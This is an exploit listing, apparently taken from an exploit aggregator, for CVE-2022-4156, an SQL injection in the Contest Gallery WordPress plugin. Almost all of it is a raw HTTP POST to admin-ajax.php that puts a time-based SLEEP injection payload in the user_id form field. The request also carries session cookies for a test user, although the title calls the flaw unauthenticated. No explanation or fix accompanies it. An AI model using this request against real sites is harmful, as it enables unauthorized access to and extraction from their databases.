Exploit for Contest Gallery < 19.1.5.1 - Unauthenticated SQL Injection CVE-2022-4156

## https://sploitus.com/exploit?id=WPEX-ID:254F6E8B-5FA9-4D6D-8E0E-1A4CAE18AEE0
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/profile.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5167035403431582548369588705
Content-Length: 2816
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C92b6fd388ba13304a4e6d05bb993994b73e939c69f835a5f48832fd667db6a41; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C4a47ea962cf6ef424f4c85c035f566bcefb106dac5c9061bff96ab380af53d60; wp-settings-time-3=1668298491
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wpnonce"

5c8402bea9
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file_to_delete_wp_id"

1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/profile.php
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="from"

profile
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="checkuser_id"

3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="color-nonce"

6f0655e068
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_color"

fresh
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_bar_front"

1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="first_name"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="last_name"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="nickname"

test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="display_name"

test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="email"

test1@c.com
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="url"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="description"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass1"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass2"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_data_available"

true
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_id"

3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="action"

post_cg_backend_image_upload
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file[]"; filename="index.png"
Content-Type: text/plain

TEST
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="user_id"

3 AND (SELECT 6037 FROM (SELECT(SLEEP(5)))Uiuu)
-----------------------------5167035403431582548369588705--